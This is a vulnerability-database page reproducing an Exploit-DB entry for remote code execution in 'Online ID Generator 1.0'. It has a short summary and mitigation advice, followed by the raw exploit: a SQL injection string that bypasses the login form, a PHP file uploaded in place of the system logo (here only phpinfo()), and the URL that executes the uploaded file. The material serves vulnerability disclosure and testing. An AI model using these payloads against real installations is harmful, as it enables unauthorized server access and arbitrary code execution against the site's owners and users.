header-logo
Suggest Exploit
vendor:
Online ID Generator 1.0
by:
nu11secur1ty
8.1
CVSS
CRITICAL
Remote Code Execution (RCE)
CWE
Product Name: Online ID Generator 1.0
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: None
2023

Online ID Generator 1.0 – Remote Code Execution (RCE)

The Online ID Generator 1.0 is vulnerable to remote code execution. It allows an attacker to bypass login using SQL injection and upload a malicious shell to execute arbitrary code on the server. By accessing the uploaded shell via a remote browser, the attacker can achieve remote code execution.

Mitigation:

To mitigate this vulnerability, the vendor should sanitize user input in the login form to prevent SQL injection. Additionally, the application should validate and restrict file uploads to prevent the execution of malicious code.
Source

Exploit-DB raw data:

## Title: Online ID Generator 1.0 - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 08/31/2023
## Vendor: https://www.youtube.com/watch?v=JdB9_po5DTc
## Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/id_generator_0.zip
## Reference: https://portswigger.net/web-security/sql-injection
## Reference: https://portswigger.net/web-security/file-upload
## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload


STATUS: HIGH-CRITICAL Vulnerability

[+]Bypass login SQLi:
# In login form, for user:

```mysql
nu11secur1ty' or 1=1#
```

[+]Shell Upload exploit:
## For system logo:
```php
<?php
	phpinfo();
?>
```
[+]RCE Exploit
## Execution from the remote browser:
```URLhttp://localhost/id_generator/uploads/1693471560_info.php
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Online-ID-Generator-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/online-id-generator-10-sqli-bypass.html)

## Time spend:
00:10:00

Navigation

Suggest Exploit

Services By CQR